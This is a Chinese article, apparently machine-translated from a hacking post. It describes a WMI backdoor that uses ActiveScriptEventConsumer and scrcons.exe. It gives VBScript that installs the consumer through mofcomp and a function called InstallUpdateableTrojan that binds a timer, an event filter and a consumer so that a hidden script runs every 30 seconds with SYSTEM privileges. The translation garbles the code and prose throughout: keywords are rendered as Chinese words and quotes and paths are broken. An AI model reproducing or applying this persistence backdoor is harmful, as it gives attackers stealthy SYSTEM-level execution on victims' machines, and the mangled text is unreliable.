完善三没有后门使用WMI（scrcons.exe）

点评：ASEC是一个标准的永久事件使用者在WMI。它的作用是执行一个预先设定的JS和VBS脚本事件时，必然会到达。

来源：菠萝菠萝

欢迎！女士们先生们，欢迎来到脚本世界。

今天是繁忙的一天。更累了，别胡说了。

这三没有的后门的核心是永久事件消费者activeｓｃｒｉｐｔeventconsumer WMI（以下简称ASEC）。有许多种WMI事件消费者。简单的说，当结合他们的事件到达，消费者将被触发执行预先定义的功能。例如，在commandlineeventconsumer可执行二进制程序等

ASEC是一个标准的永久事件使用者在WMI。它的作用是执行一个预先设定的JS和VBS脚本事件时，必然会到达。

先看样机：

复制代码代码如下所示：
类activeｓｃｒｉｐｔeventconsumer：__eventconsumer
{
1,1,0,0,0,0,0,5,18,0,0,0 uint8 creatorsid = { }； / / creatorsid事件消费者阅读
UInt32 killtimeout = 0； / /脚本允许执行时间。默认值为0，脚本不会终止。
String MachineName；
maximumqueuesize UInt32；
字符串名称；自定义事件消费名。
字符串ｓｃｒｉｐｔingengine； / /解释engine.vbｓｃｒｉｐｔ或Jｓｃｒｉｐｔ脚本
字符串ｓｃｒｉｐｔfilename； / /如果你想从文件中读取执行脚本写在这里。
字符串ｓｃｒｉｐｔText； / /为脚本代码的执行，ｓｃｒｉｐｔfilename不共戴天。你没有我，我不能没有你
}；

ASEC的安装

在XP系统，ASEC已安装在根订阅命名空间的默认。我们可以称它directly.2000 ASEC MOF文件，但没有默认安装，我们需要安装它自己。此外，大多数事件是根 cimv2生成的，所以如果你想直接捕捉一些事件触发系统，你必须在其他命名空间安装ASEC。看代码安装ASEC根 cimv2下2000 / XP / Vista。

复制代码代码如下所示：
功能installasecforwin2k rsquo；安装Windows 2000rsquo ASEC；
昏暗的asecpath2k
asecpath2k = Xshell。扩充环境变量字符串（%windir% system32wbem ）
集moffile = fso.opentextfile（asecpath2kscrcons MOF 。
mofcontent = moffile。所有
moffile。关闭
mofcontent =取代（mofcontent，默认
tempmoffile = asecpath2k温度。财政部
集tempmof = fso.createtextfile（tempmoffile，假的，真的）
tempmof写mofcontent。
tempmof.close
xshell.runmofcomp.exe N：根 cimv2tempmoffile，0，真的
fso.deletefile（TempMofFile）
asecstatus =准备好了
rsquo；名回声asecforwin2k安装好！
端功能
功能installasecforwinxp rsquo；安装Windows xprsquo ASEC；
昏暗的asecpathxp
xpasecpath = Xshell。扩充环境变量字符串（%windir% system32wbem ）
xshell.runmofcomp.exe N：根 cimv2 财政部 xpasecpath scrcons。
asecstatus =准备好了
rsquo；名回声asecforwinxp安装好！
端功能
功能installasecforvista rsquo；安装Windows vistarsquo ASEC；
昏暗的asecpath2k
asecpath2k = Xshell。扩充环境变量字符串（%windir% system32wbem ）
集F = fso.getfile（asecpath2kscrcons。财政部）
集moffile = f.openastextstream（1 - 2）
Rsquo；集moffile = fso.opentextfile（asecpath2kscrcons MOF 。
mofcontent = moffile。所有
moffile。关闭
mofcontent =取代（mofcontent，# pragma
tempmoffile = asecpath2k温度。财政部
集tempmof = fso.createtextfile（tempmoffile，假的，真的）
tempmof写mofcontent。
tempmof.close
xshell.runmofcomp.exe N：根 cimv2tempmoffile，0，真的
fso.deletefile（TempMofFile）
asecstatus =准备好了
rsquo；名回声asecforwinvista安装好！
端功能

看一个绑定事件和ASEC的实例。
复制代码代码如下所示：
Function InstallUpdateableTrojan
命名空间中wmilink =winmgmts：。 cimv2根： / / ASEC位于
trojanname =ｓｃｒｉｐｔkids / /习惯的消费者的名字，你的名字是后门
脚本运行trojanruntimer = 30000 / /自定义区间
strtxt = / /自定义脚本的内容。我们不使用ｓｃｒｉｐｔfilename为隐蔽的缘故。它的编码是通过窗户和写入CIM储存库
配置事件使用者；
集ASEC = GetObject（wmilinkactiveｓｃｒｉｐｔeventconsumer ）。spawninstance_
Asec。名字= trojanname_consumer
Asec。ｓｃｒｉｐｔingengine =VBｓｃｒｉｐｔ
Asec strtxt ｓｃｒｉｐｔText =。
集asecpath = asec.put _
配置计时器；
集wmitimer = GetObject（wmilink__intervaltimerinstruction ）。spawninstance_
wmitimer。值= trojanname_wmitimer
wmitimer intervalbetweenevents = trojanruntimer。
wmitimer skipifpassed = false。
wmitimer.put _
配置事件过滤器；
集eventfilter = GetObject（wmilink__eventfilter ）。spawninstance_
eventfilter。名称= trojanname_filter
选择*从__timerevent哪里值= trojanname _wmitimer eventfilter。查询=
eventfilter。查询=WQL
集filterpath = eventfilter.put _
绑定消费者和过滤器；
设置绑定= GetObject（wmilink__filtertoconsumerbinding ）。spawninstance_
消费= asecpath.path结合。
结合滤波器= filterpath.path。
binds.put _
端功能
上述代码的含义是，当一个自定义的定时器事件发生，我们将通过我们的配置和触发消费者必然的滤波器，即事件过滤器捕获，我们定制的脚本ASEC。实现我们执行自定义脚本每30秒的目的很简单：）

最后，我们的自定义脚本，通过系统自带的scrcons.exe作为脚本主机进行了分析，并scrcons.exe通过系统权限的系统启动，也就是说，我们的脚本是执行的系统权限，任何过程，它创造了将继承的系统权限，每个脚本都要完美，将一个多scrcons.exe系统过程。这也是对脚本后门最容易发现的弱点。但当脚本运行24个小时，有多少人会注意到它吗

标签：后门技巧 scrcons WMI exe

免责声明：本网信息来自于互联网，目的在于传递更多信息，并不代表本网赞同其观点。其原创性以及文中陈述文字和内容未经本站证实，对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺，并请自行核实相关内容。本站不承担此类作品侵权行为的直接责任及连带责任。如若本网有任何内容侵犯您的权益，请及时联系我们，本站将会在24小时内处理完毕。